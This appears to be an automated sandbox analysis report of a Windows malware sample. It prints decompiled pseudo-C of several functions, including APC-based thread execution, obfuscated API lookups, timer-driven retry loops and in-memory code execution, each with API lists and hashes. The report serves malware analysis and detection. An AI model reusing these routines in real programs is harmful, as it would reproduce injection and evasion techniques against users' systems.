Part of subcall function 02F69DEF: lstrlen.KERNEL32(?,00000000,00000000,02F65335,616D692F,00000000), ref: 02F69DFB
Part of subcall function 02F69DEF: lstrlen.KERNEL32(?), ref: 02F69E03
Part of subcall function 02F69DEF: lstrcpy.KERNEL32(00000000,?), ref: 02F69E1A
Part of subcall function 02F69DEF: lstrcat.KERNEL32(00000000,?), ref: 02F69E25

lstrcpy.KERNEL32(00000000,?), ref: 02F61919
lstrcpy.KERNEL32(?,?), ref: 02F61921
lstrcat.KERNEL32(?,?), ref: 02F6192F
lstrcat.KERNEL32(?,00000000), ref: 02F61935

Part of subcall function 02F6A5E9: lstrlen.KERNEL32(?,00000000,02F6D330,00000001,02F6937A,02F6D00C,02F6D00C,00000000,00000005,00000000,00000000,?,?,?,02F6207E,?), ref: 02F6A5F2
Part of subcall function 02F6A5E9: mbstowcs.NTDLL ref: 02F6A619
Part of subcall function 02F6A5E9: memset.NTDLL ref: 02F6A62B

wcstombs.NTDLL ref: 02F619C8

Part of subcall function 02F6A060: SysAllocString.OLEAUT32(?), ref: 02F6A09B
Part of subcall function 02F6A060: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 02F6A11E

Part of subcall function 02F6147E: RtlFreeHeap.NTDLL(00000000,00000000,02F61D11,00000000,?,?,-00000008), ref: 02F6148A

HeapFree.KERNEL32(00000000,?,?), ref: 02F61A09
RtlFreeHeap.NTDLL(00000000,00000000,616D692F,00000000), ref: 02F61A15
RtlFreeHeap.NTDLL(00000000,?,?,03AA95B0), ref: 02F61A21
HeapFree.KERNEL32(00000000,?), ref: 02F61A2D
RtlFreeHeap.NTDLL(00000000,?), ref: 02F61A39

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 603507560-0
Opcode ID: d4020d2bcacfe1e051ee2598f0f58b76bb6cddecdb879ed95b231ead83c541f2
Instruction ID: 325c8a27c4dac760187b73332cf8bf92a2ee14674b74406b88a4a3c339180fc1
Opcode Fuzzy Hash: d4020d2bcacfe1e051ee2598f0f58b76bb6cddecdb879ed95b231ead83c541f2
Instruction Fuzzy Hash: 22914771E00209BFCB11EFA5DD8CAAABBB9EF08794B150855F558E7220CB31D961DB60

Uniqueness

Uniqueness Score: -1.00%

Function 015111D4, Relevance: 22.6, APIs: 15, Instructions: 112
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E015111D4(void* __ecx, void* __edx, void* __edi, long _a4) {
				long _v8;
				void* _v32;
				long _t21;
				long _t23;
				long _t25;
				void* _t26;
				long _t29;
				long _t30;
				long _t34;
				void* _t39;
				intOrPtr _t42;
				void* _t47;
				void* _t52;
				signed int _t55;
				void* _t57;
				intOrPtr* _t58;

				_t47 = __ecx;
				_t21 = E0151179C();
				_v8 = _t21;
				if(_t21 != 0) {
					return _t21;
				}
				do {
					_t55 = SwitchToThread() + 8;
					_t23 = E01511B6F(__edi, _t55); // executed
					_v8 = _t23;
					Sleep(0x20 + _t55 * 4); // executed
					_t25 = _v8;
				} while (_t25 == 0xc);
				if(_t25 != 0) {
					L21:
					return _t25;
				}
				_push(__edi);
				if(_a4 != 0) {
					L11:
					_t26 = CreateThread(0, 0, __imp__SleepEx,  *0x1514140, 0, 0); // executed
					_t57 = _t26;
					if(_t57 == 0) {
						L18:
						_v8 = GetLastError();
						L19:
						_t25 = _v8;
						if(_t25 == 0xffffffff) {
							_t25 = GetLastError();
						}
						goto L21;
					}
					_t29 = QueueUserAPC(E015116E4, _t57,  &_v32); // executed
					if(_t29 == 0) {
						_t34 = GetLastError();
						_a4 = _t34;
						TerminateThread(_t57, _t34);
						CloseHandle(_t57);
						_t57 = 0;
						SetLastError(_a4);
					}
					if(_t57 == 0) {
						goto L18;
					} else {
						_t30 = WaitForSingleObject(_t57, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t57,  &_v8); // executed
						}
						CloseHandle(_t57);
						goto L19;
					}
				}
				if(E0151130B(_t47,  &_a4) != 0) {
					 *0x1514138 = 0;
					goto L11;
				}
				_t58 = __imp__GetLongPathNameW;
				_t39 =  *_t58(_a4, 0, 0); // executed
				_t52 = _t39;
				if(_t52 == 0) {
					L9:
					 *0x1514138 = _a4;
					goto L11;
				}
				_t10 = _t52 + 2; // 0x2
				_t42 = E01511026(_t52 + _t10);
				 *0x1514138 = _t42;
				if(_t42 == 0) {
					goto L9;
				}
				 *_t58(_a4, _t42, _t52); // executed
				E01511938(_a4);
				goto L11;
			}

0x015111d4
0x015111db
0x015111e2
0x015111e7
0x01511308
0x01511308
0x015111ee
0x015111f6
0x015111fa
0x015111ff
0x0151120a
0x01511210
0x01511213
0x0151121a
0x01511305
0x00000000
0x01511305
0x01511220
0x01511224
0x0151127a
0x0151128a
0x01511290
0x0151129a
0x015112f5
0x015112f7
0x015112fa
0x015112fa
0x01511301
0x01511303
0x01511303
0x00000000
0x01511301
0x015112a6
0x015112b4
0x015112b6
0x015112ba
0x015112bd
0x015112c4
0x015112c9
0x015112cb
0x015112cb
0x015112d3
0x00000000
0x015112d5
0x015112d8
0x015112de
0x015112e3
0x015112ea
0x015112ea
0x015112f1
0x00000000
0x015112f1
0x015112d3
0x01511231
0x01511274
0x00000000
0x01511274
0x01511233
0x0151123e
0x01511240
0x01511244
0x0151126a
0x0151126d
0x00000000
0x0151126d
0x01511246
0x0151124b
0x01511250
0x01511257
0x00000000
0x00000000
0x0151125e
0x01511263
0x00000000

APIs

Part of subcall function 0151179C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,015111E0), ref: 015117AB
Part of subcall function 0151179C: GetVersion.KERNEL32(?,015111E0), ref: 015117BA
Part of subcall function 0151179C: GetCurrentProcessId.KERNEL32(?,015111E0), ref: 015117D6
Part of subcall function 0151179C: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,015111E0), ref: 015117EF

SwitchToThread.KERNEL32 ref: 015111EE

Part of subcall function 01511B6F: VirtualAlloc.KERNELBASE(00000000,-00000008,00003000,00000004,00000000,?,-00000008,-00000008), ref: 01511BC5
Part of subcall function 01511B6F: memcpy.NTDLL(?,?,-00000008,?,?,?,?,?,?,?,?,015111FF,-00000008), ref: 01511C57
Part of subcall function 01511B6F: VirtualFree.KERNELBASE(?,00000000,00008000), ref: 01511C72

Sleep.KERNELBASE(00000000,-00000008), ref: 0151120A
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 0151123E
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 0151125E
CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?), ref: 0151128A
QueueUserAPC.KERNELBASE(015116E4,00000000,?), ref: 015112A6
GetLastError.KERNEL32 ref: 015112B6
TerminateThread.KERNEL32(00000000,00000000), ref: 015112BD
CloseHandle.KERNEL32(00000000), ref: 015112C4
SetLastError.KERNEL32(?), ref: 015112CB
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 015112D8
GetExitCodeThread.KERNELBASE(00000000,?), ref: 015112EA
CloseHandle.KERNEL32(00000000), ref: 015112F1
GetLastError.KERNEL32 ref: 015112F5
GetLastError.KERNEL32 ref: 01511303

Memory Dump Source

Source File: 00000000.00000002.457064738.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true

Associated: 00000000.00000002.457074162.0000000001515000.00000040.00000001.sdmp Download File
Associated: 00000000.00000002.457082559.0000000001517000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchTerminateUserVersionWaitmemcpy
String ID:
API String ID: 3896949738-0
Opcode ID: efd9e4438033b6a072049ae056529b35e4dd1a357eb6196b3c1929d80c67937c
Instruction ID: 8d8b55ec1a7c3407a8e0b463c405809ef9df8c3b4bf1f9bc3a7690011858b876
Opcode Fuzzy Hash: efd9e4438033b6a072049ae056529b35e4dd1a357eb6196b3c1929d80c67937c
Instruction Fuzzy Hash: D43164B1900519BFEB23AFB5DCC489E7BE8FB082607124565FA25DF108D7349A459BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F6ADA5, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E02F6ADA5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x2f60000;
				_t115 = _t139[3] + 0x2f60000;
				_t131 = _t139[4] + 0x2f60000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x2f60000;
				_v16 = _t139[5] + 0x2f60000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x2f60002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x2f6d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x2f6d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x2f6d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x2f6d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x2f6d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x2f6d198; // 0x0
										 *_t102 = _t125;
										 *0x2f6d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x2f6d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x02f6adb4
0x02f6adca
0x02f6add0
0x02f6add2
0x02f6add7
0x02f6addd
0x02f6ade2
0x02f6ade5
0x02f6adf3
0x02f6adfa
0x02f6adfd
0x02f6ae00
0x02f6ae01
0x02f6ae04
0x02f6ae07
0x02f6ae0a
0x02f6ae0f
0x02f6ae1e
0x00000000
0x02f6ae24
0x02f6ae2e
0x02f6ae38
0x02f6ae3d
0x02f6ae3f
0x02f6ae49
0x02f6ae4c
0x02f6ae4f
0x02f6ae55
0x02f6ae57
0x02f6ae57
0x02f6ae5a
0x02f6ae5d
0x02f6ae62
0x02f6ae66
0x02f6ae79
0x02f6ae7b
0x02f6af23
0x02f6af23
0x02f6af2a
0x02f6af2d
0x02f6af37
0x02f6af37
0x02f6af3b
0x02f6afb9
0x02f6afbc
0x02f6afbe
0x02f6afbe
0x02f6afc5
0x02f6afc7
0x02f6afd1
0x02f6afd4
0x02f6afd7
0x02f6afd7
0x00000000
0x02f6af3d
0x02f6af40
0x02f6af6e
0x02f6af78
0x02f6af7c
0x02f6af84
0x02f6af87
0x02f6af8e
0x02f6af98
0x02f6af98
0x02f6af9c
0x02f6afa1
0x02f6afb0
0x02f6afb6
0x02f6afb6
0x02f6af9c
0x00000000
0x02f6af47
0x02f6af4a
0x02f6af52
0x02f6af67
0x02f6af6c
0x00000000
0x00000000
0x02f6af6c
0x00000000
0x02f6af52
0x02f6af40
0x02f6af3b
0x02f6ae81
0x02f6ae88
0x02f6ae98
0x02f6ae9b
0x02f6aea1
0x02f6aea5
0x02f6aee8
0x02f6aef4
0x02f6af1d
0x02f6aef6
0x02f6aefa
0x02f6af00
0x02f6af08
0x02f6af0a
0x02f6af0d
0x02f6af13
0x02f6af15
0x02f6af15
0x02f6af08
0x02f6aefa
0x00000000
0x02f6aef4
0x02f6aead
0x02f6aeb0
0x02f6aeb7
0x02f6aec7
0x02f6aeca
0x02f6aeda
0x00000000
0x02f6aee0
0x02f6aec1
0x02f6aec5
0x00000000
0x00000000
0x00000000
0x02f6aec5
0x02f6ae92
0x02f6ae96
0x00000000
0x00000000
0x00000000
0x02f6ae96
0x02f6ae6f
0x02f6ae73
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 02F6AE1E
LoadLibraryA.KERNELBASE(?), ref: 02F6AE9B
GetLastError.KERNEL32 ref: 02F6AEA7
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 02F6AEDA

Strings

$, xrefs: 02F6ADF3

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $
API String ID: 948315288-3993045852
Opcode ID: f6c86572d17189ea6876d735cdad1cd89be3ad2fc7df5a28c3aef2640ce00b2f
Instruction ID: 274b51fc913b9517cd96f3da02511af6f18f8123ad7de61611ae865cb6396057
Opcode Fuzzy Hash: f6c86572d17189ea6876d735cdad1cd89be3ad2fc7df5a28c3aef2640ce00b2f
Instruction Fuzzy Hash: 60815FB2E40209AFDB10CF99D988BADB7F5FF48784F14842AE655E7240EB70E904CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02F69B6F, Relevance: 16.7, APIs: 11, Instructions: 152
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E02F69B6F(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				intOrPtr _v120;
				struct %anon52 _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				struct %anon52 _t65;
				intOrPtr _t67;
				void* _t68;
				void* _t72;
				signed int _t73;
				void* _t75;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t75 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x2f6d240);
					_v76 = 0;
					_v80 = 0;
					L02F6B088();
					_v84.LowPart = _t46;
					_v80 = _t75;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x2f6d26c; // 0x1d0
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x2f6d24c = 5;
						} else {
							_t68 = E02F668CF(); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x2f6d260 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t73 = _v104.LowPart;
						_t58 = _t73 << 4;
						_t78 = _t89 + (_t73 << 4) + 0x3c;
						_t74 = _t73 + 1;
						_v92.LowPart = _t73 + 1;
						_t60 = E02F69F11(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
						_v128.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v92;
						_v104.LowPart = _t65;
						_t97 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_t67 = E02F654AC(_t74, _t97,  &_v72, _a4, _a8); // executed
							_v120 = _t67;
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x2f6d244);
							goto L21;
						} else {
							__eflags =  *0x2f6d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E02F66106();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x2f6d248);
								L21:
								L02F6B088();
								_v104.LowPart = _t60;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t72 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							RtlFreeHeap( *0x2f6d238, 0, _t54); // executed
						}
						_t82 =  &(_t82[4]);
						_t72 = _t72 - 1;
					} while (_t72 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}

0x02f69b6f
0x02f69b85
0x02f69b89
0x02f69b8e
0x02f69b95
0x02f69b9b
0x02f69ba1
0x02f69d29
0x02f69ba7
0x02f69ba7
0x02f69ba9
0x02f69bae
0x02f69baf
0x02f69bb5
0x02f69bb9
0x02f69bbd
0x02f69bcb
0x02f69bd9
0x02f69bdd
0x02f69bdf
0x02f69bec
0x02f69bf8
0x02f69bfa
0x02f69c00
0x02f69c09
0x02f69c14
0x02f69c14
0x02f69c0b
0x02f69c0b
0x02f69c12
0x00000000
0x00000000
0x02f69c12
0x02f69c1e
0x00000000
0x02f69c22
0x02f69c27
0x02f69c32
0x02f69c32
0x02f69c3a
0x02f69c45
0x02f69c4d
0x02f69c56
0x02f69c59
0x02f69c5d
0x02f69c62
0x02f69c68
0x00000000
0x00000000
0x02f69c6a
0x02f69c6e
0x02f69c72
0x02f69c75
0x00000000
0x02f69c77
0x02f69c82
0x02f69c87
0x02f69c87
0x00000000
0x02f69cb8
0x02f69cb8
0x02f69cbd
0x02f69cdc
0x02f69cde
0x02f69ce3
0x02f69ce4
0x00000000
0x02f69cbf
0x02f69cbf
0x02f69cc5
0x00000000
0x02f69cc7
0x02f69cc7
0x02f69ccc
0x02f69cce
0x02f69cd3
0x02f69cd4
0x02f69cea
0x02f69cea
0x02f69cf2
0x02f69d00
0x02f69d04
0x02f69d10
0x02f69d12
0x02f69d16
0x02f69d18
0x00000000
0x02f69d1e
0x00000000
0x02f69d1e
0x02f69d18
0x02f69cc5
0x00000000
0x02f69cbd
0x02f69c8b
0x02f69c8d
0x02f69c91
0x02f69c92
0x02f69c92
0x02f69c96
0x02f69ca0
0x02f69ca0
0x02f69ca6
0x02f69ca9
0x02f69ca9
0x02f69cb0
0x02f69cb0
0x02f69d37
0x00000000

APIs

memset.NTDLL ref: 02F69B89
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 02F69B95
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 02F69BBD
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 02F69BDD
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,02F64AC4,?), ref: 02F69BF8
RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,02F64AC4,?,00000000), ref: 02F69CA0
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02F64AC4,?,00000000,?,?), ref: 02F69CB0
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 02F69CEA
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 02F69D04
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02F69D10

Part of subcall function 02F668CF: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03AA9388,00000000,?,7519F710,00000000,7519F730), ref: 02F6691E
Part of subcall function 02F668CF: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,03AA93C0,?,00000000,30314549,00000014,004F0053,03AA937C), ref: 02F669BB
Part of subcall function 02F668CF: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02F69C10), ref: 02F669CD

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02F64AC4,?,00000000,?,?), ref: 02F69D23

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: 61ac9c20ad4d643823165768dae5bf49650579467802563cbddd2c854fc5aeb5
Instruction ID: 3425085d8de3664c63d85bb881876b0aa758bff4fe017882f1b7d585bc1c4f96
Opcode Fuzzy Hash: 61ac9c20ad4d643823165768dae5bf49650579467802563cbddd2c854fc5aeb5
Instruction Fuzzy Hash: F0516971908325BFC710AF25DD48DABFBE9EB857A4F408A1AFAA4D2150D7B0C514CF92

Uniqueness

Uniqueness Score: -1.00%

Function 02F61493, Relevance: 13.6, APIs: 9, Instructions: 110
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E02F61493(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t39;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t57;
				void* _t66;
				intOrPtr _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;

				_t1 = __eax + 0x14; // 0x74183966
				_t67 =  *_t1;
				_t36 = E02F657D8(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16); // executed
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
				_t39 = _v12(_v12);
				_v8 = _t39;
				if(_t39 == 0 && ( *0x2f6d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t46 =  *0x2f6d2a4; // 0xb3a5a8
					_t18 = _t46 + 0x2f6e3e6; // 0x73797325
					_t66 = E02F677E6(_t18);
					if(_t66 == 0) {
						_v8 = 8;
					} else {
						_t49 =  *0x2f6d2a4; // 0xb3a5a8
						_t19 = _t49 + 0x2f6e747; // 0x3aa8cef
						_t20 = _t49 + 0x2f6e0af; // 0x4e52454b
						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t69 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E02F6684E();
							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
							_push(1);
							E02F6684E();
							if(_t57 == 0) {
								_v8 = GetLastError();
							} else {
								FindCloseChangeNotification(_v28); // executed
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x2f6d238, 0, _t66);
					}
				}
				_t68 = _v16;
				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
				E02F6147E(_t68);
				goto L12;
			}

0x02f6149b
0x02f6149b
0x02f614aa
0x02f614b1
0x02f614b6
0x02f615c6
0x02f615cd
0x02f615cd
0x02f614c5
0x02f614d0
0x02f614d3
0x02f614d8
0x02f614ed
0x02f614f3
0x02f614f4
0x02f614f7
0x02f614fd
0x02f61500
0x02f61505
0x02f6150d
0x02f61519
0x02f6151d
0x02f615ad
0x02f61523
0x02f61523
0x02f61528
0x02f6152f
0x02f61543
0x02f61547
0x02f61596
0x02f61549
0x02f6154a
0x02f61551
0x02f6156a
0x02f6156c
0x02f61570
0x02f61577
0x02f61591
0x02f61579
0x02f61582
0x02f61587
0x02f61587
0x02f61577
0x02f615a5
0x02f615a5
0x02f6151d
0x02f615b4
0x02f615bd
0x02f615c1
0x00000000

APIs

Part of subcall function 02F657D8: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02F614AF,?,?,?,?,00000000,00000000), ref: 02F657FD
Part of subcall function 02F657D8: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02F6581F
Part of subcall function 02F657D8: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02F65835
Part of subcall function 02F657D8: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02F6584B
Part of subcall function 02F657D8: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02F65861
Part of subcall function 02F657D8: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02F65877

memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 02F614C5
UserClientDllInitialize.USER32(?,?,00000000,00000000), ref: 02F614D0
memset.NTDLL ref: 02F61500

Part of subcall function 02F677E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,02F6333A,73797325), ref: 02F677F7
Part of subcall function 02F677E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02F67811

GetModuleHandleA.KERNEL32(4E52454B,03AA8CEF,73797325), ref: 02F61536
GetProcAddress.KERNEL32(00000000), ref: 02F6153D
HeapFree.KERNEL32(00000000,00000000), ref: 02F615A5

Part of subcall function 02F6684E: GetProcAddress.KERNEL32(36776F57,02F6935F), ref: 02F66869

FindCloseChangeNotification.KERNELBASE(00000000,00000001), ref: 02F61582
CloseHandle.KERNEL32(?), ref: 02F61587
GetLastError.KERNEL32(00000001), ref: 02F6158B

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ChangeClientErrorFindFreeHeapInitializeLastNotificationUsermemcpymemset
String ID:
API String ID: 1453214525-0
